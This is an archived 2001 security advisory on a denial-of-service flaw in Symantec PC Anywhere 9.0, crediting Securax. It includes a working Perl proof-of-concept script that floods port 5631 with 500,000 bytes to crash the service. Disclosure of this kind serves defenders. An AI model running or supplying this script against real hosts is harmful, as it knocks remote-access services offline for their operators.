Reported February 11, 2001 by Securax.

VERSIONS AFFECTED
  • PC Anywhere 9.0

DESCRIPTION

A Denial of Service (DoS) vulnerability has been discovered in Symantec PC Anywhere 9.0. By sending anywhere between 320KB to 500KB of data to one of the two listening ports (5631 and 65301), a malicious user can cause PCAnywhere to crash. Currently, the vulnerability is a simple DoS risk, but the attack might be developed into an exploitable overflow.

DEMONSTRATION

The following proof of concept code was supplied by Securax.

<--bof-->

   #!/usr/bin/perl

   # Symantec PcAnywhere 9.0 Denial of Service
   # -----------------------------------------
   # by incubus <incubus@securax.net>
   # http://www.hexyn.be
   #
   # http://www.securax.net
   # All my love to Tessa.
   # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
   # Zym0tic, segfault, #securax@irc.hexyn.be
   # Thanks to jurgen swennen, for letting me (ab)use his computer.
   #
   # this is intended as proof of concept, do not abuse!

   use IO::Socket;
   $host = "$ARGV\[0\]";
   $port = 5631;
   if ($#ARGV<0) \{
   print "use it like: $0 <hostname>\n";
   exit();
   \}
   $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
   print "hello\n";
   $buf = "";
   for($counter = 0; $counter < 500000; $counter++) \{
           $buf .= "\x61";
   \}
   print $socket "$buf\n";
   close($socket);
   exit();

  <--eof-->

VENDOR RESPONSE

Unfortunately, Securax released its advisory to the public in conjunction with contacting the vendor, so no vendor response is available at this time. A copy of the Securax advisory is available at:

 

http://listserv.ntsecurity.net/scripts/wa-ntsecurity.exe?A2=ind0102b&L=win2ksecadvice&F=&S=&P=1025

CREDIT
Discovered by
Securax.